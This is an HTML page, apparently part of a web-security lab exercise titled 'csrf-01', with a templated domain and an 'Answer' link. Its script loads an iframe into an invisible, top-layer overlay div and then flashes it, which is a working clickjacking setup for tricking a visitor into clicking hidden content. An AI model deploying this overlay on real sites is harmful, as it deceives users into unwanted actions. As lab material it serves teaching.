<!DOCTYPE html>
<html>

<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
  <title>csrf-01</title>
</head>

<body>
  <div id="trick" style="position:absolute; cursor:pointer; background-color:yellow; z-index:9999; opacity:0.0; display:block; margin-top:-220px; margin-left: -10px; width:50px; height:250px; overflow:hidden;">
  </div>
  <a target="_blank" href="https://{{domain}}/csrf-02/form.php" style="font-size:70%;">Answer</a>
  <hr>
  <script type="text/javascript">
    jQuery(function($)
    {
      $('#trick').append(
        '<iframe height="300px"  src="/csrf-02/iframe1"></iframe>'
      );
      setTimeout(function()
      {
        $('#trick').fadeTo(1000, 1).fadeTo(1000, 0).fadeTo(1000, 1).fadeTo(
          1000, 0).fadeTo(1000, 1).fadeTo(1000, 0, function()
        {
          $('#trick').remove();
        });
      }, 5 * 1000);

    });
  </script>
</body>

</html>
